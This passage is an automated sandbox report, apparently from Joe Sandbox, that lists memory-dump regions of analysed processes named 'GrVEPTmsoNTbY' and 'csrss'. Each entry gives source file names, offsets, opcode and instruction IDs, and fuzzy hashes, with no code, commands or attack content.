                                                      • Instruction Fuzzy Hash: 6F51CF20E1C94E5FEA98FA6C84563B973D2FF98798F049179C40EC3287DFB8A8414385
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction ID: b124d02e397c1a7b8d0303321a6513e14cd487888f4127425d5d9bfeb77e7c54
                                                      • Opcode Fuzzy Hash: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction Fuzzy Hash: D7F06D7194E7C44FCB1AEA348868454BFA0EF6721174A41EEC056CF1A7EA6D8885C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction ID: 3fdafac0eca549572a7c9544ab130378ecd1bed7e7640abfe0a55f293b209eef
                                                      • Opcode Fuzzy Hash: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction Fuzzy Hash: 9FE0487144E7D44FCB06EB7484698553FA0EF67615B8A40DEC045CF1B3E66D988AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction ID: a1ead72dabc0c1e0d961b4c791e8f8e33dcaf56f56cd3c594ab1bc0e3267adef
                                                      • Opcode Fuzzy Hash: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction Fuzzy Hash: CDE01A7184E7C44FCB4AEB74886A9943FA0EE6B21578A40EEC045CF1B3E62D8849C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction ID: 529866176ef0b688c76d809301fc431a556a99169a3855fceffe04aa7ab50ff9
                                                      • Opcode Fuzzy Hash: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction Fuzzy Hash: BBE0127184E7D44FCB06EB7488798557FA0EE6725174B41EEC045CF1B3D62D8845C701
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c2f16d8db0eed7b95124cf1ec9bc6142995b0c4af75eab6ecbfd495284f2cdf
                                                      • Instruction ID: 882f5c91a7a2c844df045c3e8c3407336dcb5a08418624bd35ca4bd901546209
                                                      • Opcode Fuzzy Hash: 9c2f16d8db0eed7b95124cf1ec9bc6142995b0c4af75eab6ecbfd495284f2cdf
                                                      • Instruction Fuzzy Hash: 82027F30E1CA5A8FEB98FA2884516B973E2FF54780F5445B9D00DD3287DF39AD428B85
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 954ca19030be468e762079e2b9b9c615a78a594cd170796482d260903d71e36f
                                                      • Instruction ID: d0472730689bf4f00cc30f2200dfa38d9b95aa8bef770d0c6ff86ffd4e4db22d
                                                      • Opcode Fuzzy Hash: 954ca19030be468e762079e2b9b9c615a78a594cd170796482d260903d71e36f
                                                      • Instruction Fuzzy Hash: 95415952E4D9626EE309B378A0992FC7B80FF853A5F1844BBD04CC71D3DF1878818698
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c55a7dc2c3594fc99d55759e0972df581a349fda12e9a9b03ada7104c52ddb0
                                                      • Instruction ID: 4e94254cd464871059f89a6d4d84a490b46f18c3f5ae4c13ce344f390e797994
                                                      • Opcode Fuzzy Hash: 5c55a7dc2c3594fc99d55759e0972df581a349fda12e9a9b03ada7104c52ddb0
                                                      • Instruction Fuzzy Hash: 2321F120B1C95A6FE788F62C544A77976C2EF99755F5000B9E40EC32D6DE38AC818284
                                                      • Instruction Fuzzy Hash: EDE0863164A7804FC30956288C698543BB1DF67111B5641DAC045CF673D61EDC89C701
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction ID: 7c3d38eaf0a35be235a7287bcf9d0aab9b34bd2ebfd2bcbf713ab54be9d6b698
                                                      • Opcode Fuzzy Hash: 8d083797cc4c37f643a7e6df7e863d89c9124def3c79d8af5b12689d34e08bd9
                                                      • Instruction Fuzzy Hash: 79E04F3164A7804FC30A56288C698543BB19F67111B5A41DAC045CF6B3D61ADC88C702
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction ID: 4a7b6bca2c18ab1e76a1545fbd5070b9c907dbc633d39fb8da44e7bf878f86b1
                                                      • Opcode Fuzzy Hash: a06b60985aa9db39ab0d5be490f14ce91fefdc09fba2be95d94fe4c2d1642b69
                                                      • Instruction Fuzzy Hash: 8FD05E30B609094B8B4CB62D8459434B3D1F7AA2067D45278940BC3281ED25ECC68B84
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b323ea65f0d69d6319091732661e3e27e3172cec70c7522890bd877d72fc47ce
                                                      • Instruction ID: a200a171d0cba60626f87d9789dd4aaead703030232136c5746e2fca3daa07be
                                                      • Opcode Fuzzy Hash: b323ea65f0d69d6319091732661e3e27e3172cec70c7522890bd877d72fc47ce
                                                      • Instruction Fuzzy Hash: 72E0EC3150A7844FC70A972488A99403FB0EE2B21178A01C7D045CB5B3E6598C89C752
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction ID: fd5e002d15d490e9fc1417daa2cbb9a4321dfeb680e7be21b7b08ebdf7e14038
                                                      • Opcode Fuzzy Hash: 2bf13e036f4edc9b53d0d0af8e3e61debb82d912effd663b3793d36e5be8d87e
                                                      • Instruction Fuzzy Hash: 59E0123150A7854FC30A9B28C8A99547FB0EF27211B9701D7C005CF573D61DDC99C751
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction ID: 604417b3b3542cd8c60929ed4a2d5b0b4ca1cb7ae624cf3b0c4c760a0363f089
                                                      • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                      • Instruction Fuzzy Hash: 97D01234B549054FC70CBA388C99C747391EB6E216B9540A9D00AD73B5DA6ADC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction ID: 11a9089a325351e74b09ddd1052655bbc03aa67a49e6dbc6211aa68b6dca963e
                                                      • Opcode Fuzzy Hash: 68f8eb30df453edda37dc56eca5fbe8d0d3c4f9fcdc6587351046ae7d8bb2356
                                                      • Instruction Fuzzy Hash: BED01234B549084FC70CB738D85987473A1EB6A216B9540A9D00AC72B1DAAADC89C741
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction ID: 2b96d45ef71432857712c683db16e96e9eb7f5b491d608a39e16b13a73cadc41
                                                      • Opcode Fuzzy Hash: aae742ec509e37bef433d0f190d0ea65dccd9f4eefabc6c58d72cd231d081a73
                                                      • Instruction Fuzzy Hash: 3DC08C305548084FCB0CFB28C898C64B3E0FB6A305BC100A8D00EC71B0EAAA9C88CB82
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction ID: 307375f2f39e48a3ce7c2fd4ed40096ef78becb920e82222f69354ac1956991e
                                                      • Opcode Fuzzy Hash: 4cf08b807beb86177fe26698fcde08e7472f0c944b41054036d67487a8be95b2
                                                      • Instruction Fuzzy Hash: 22C08C305118088FC70CFB2CC89DD60B3E0FB2A201F9200A8D40ECB531EB6A9DE8CB81
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba9585d291f5e8e28fb19cc7ed25b618090365bf794cc933970eb2e67ad85f43
                                                      • Instruction ID: f47f1b3c22eb51c81e5b9e5c002acd9458c22d2e9f6d85beb6f5b0b4ae46c2c4
                                                      • Opcode Fuzzy Hash: ba9585d291f5e8e28fb19cc7ed25b618090365bf794cc933970eb2e67ad85f43
                                                      • Instruction Fuzzy Hash: F3D05E2192DA5A4EEB52B770841A2BD56A2BF10350F8844B8D84EB71D3CF7D74005A84
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 3733c24adb4382d9a53a210685dc36ebdcbea8b66b98e3371b2b595405a3d5ea
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 48D0C92AC1D5238FFA72305448241BD0255BBA03B5FA947B2D83D3A1D5AF7DBD41861A
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: df46ae11a4307f9da4f694c293df9133eccd3b9680619939cdf0be34c2d8d1d6
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 79C08C309108088FC908FB28C88480837A0FB09200BC20090E008C7170D229ECE0C740
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 197fe891babc001c33dde91eadb533450ec83ce654e6901ce66ad27a688feccf
                                                      • Instruction ID: 4abe43fda8431ec0746db7e9190bbf709e7b13f5a0df92933d6a976dc726d288
                                                      • Opcode Fuzzy Hash: 197fe891babc001c33dde91eadb533450ec83ce654e6901ce66ad27a688feccf
                                                      • Instruction Fuzzy Hash: 62C08C05E0DC5A9AE256620440222BE40829F80B84F9400B5E01E863CACF0C2E0102CA
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000026.00000002.2298345420.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_38_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: cf79c5b567ccb859426320fc966103f1301b8e5d9946be8043e9b4061092b02d
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction ID: 538681e39e8b4deb11982b87fcc777e952730e097e27c8c5ef8cd1d695503f26
                                                      • Opcode Fuzzy Hash: e9d10af1b9ed59d83c94183d7c6af2c4edb5cf2e1e1dd6d37097d4994188bd3b
                                                      • Instruction Fuzzy Hash: 7FF09B7190E7C44FC71AEA3488694547FA0EF6721174A51EEC045CF1A3DA2DDC45C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction ID: 9bc60aab2d95d71ba3516f50865908653f7a6e85a339ffa963ee6dbb17b3229c
                                                      • Opcode Fuzzy Hash: af62d64c9eea5667c441b423537b2437a84c908086ff5a8e99bf5604b8924664
                                                      • Instruction Fuzzy Hash: CBF06D7190E7C48FCB1AEA3488694547FA0EF6720174A46EEC085CF1A3EA2DCC89CB11
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction ID: 25fad13e3738dcfd67e17979f3d9864b2ea717ffd0f090844797d40fe1b96cf2
                                                      • Opcode Fuzzy Hash: c14079f909465edeacc4e4ac41ab61fc6129e76ed6af58be8bfd6d9e3434686b
                                                      • Instruction Fuzzy Hash: 40F06D7190E7C48FDB1AEB7888698557FA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction ID: fab309a02eb38c18ccbe73b8a32d64f6c988185e2e3e8dcfb88004a3f5813fd3
                                                      • Opcode Fuzzy Hash: 1c3f5f7381fda12de9fd3b56ca3b5b258e950b3deb9177c500fe15ad4dde55b0
                                                      • Instruction Fuzzy Hash: CAE0487144E7D44FCB06EB3484698553F60EF6721578A40EEC045CF1B3E62D988AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction ID: 1f3aab2526cadab3994b5b12a911b89d2b7f9689e191491a9806ec64aeeabe8d
                                                      • Opcode Fuzzy Hash: 3a1ee097e8447e0de5faaae1d02f8aabf37f0114f9ac78b61e4219991670ecbc
                                                      • Instruction Fuzzy Hash: 49E01A7184E7C48FCB4AEB74886A9543FA0EE6B21178A40EEC045CF1B3E62D8849C701
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 310f9fe2f56f4529c0b080e176f15db6ea47deafde5793eeb017397f8a7d44c7
                                                      • Instruction ID: f4c721cc11e6c19877f299db1d96235c69a6049f793cd408ca0a91d3ed3f1f72
                                                      • Opcode Fuzzy Hash: 310f9fe2f56f4529c0b080e176f15db6ea47deafde5793eeb017397f8a7d44c7
                                                      • Instruction Fuzzy Hash: 28418F52A4E9992EE309B37CA0952FC7780EF45361F1845BFD04DC71D3DE2864818699
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45824dcc48ef378bcdc5184017fbcf0daed4bb1fc2f6102d990a2abf43a3535c
                                                      • Instruction ID: 15dea7d7c2072637053a2983dd6fd61d2f85fd9d46a47fe9b4b16fa957f6c303
                                                      • Opcode Fuzzy Hash: 45824dcc48ef378bcdc5184017fbcf0daed4bb1fc2f6102d990a2abf43a3535c
                                                      • Instruction Fuzzy Hash: E831C43290D6894FE716ABA488215EA7FA1FF97354F0502FBD089C71D3DA68580A8391
                                                      Memory Dump Source
                                                      • Source File: 00000027.00000002.2300839183.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_39_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a14c0d6d08d1f4a984ac3ae70772f5ed6ffe6d1df5115cad950b3c16aca0aa
                                                      • Instruction ID: fb6fee02ab0cbcb2dc0e1b3aebb81943906aeddeb2e766a7795c7017bb667716
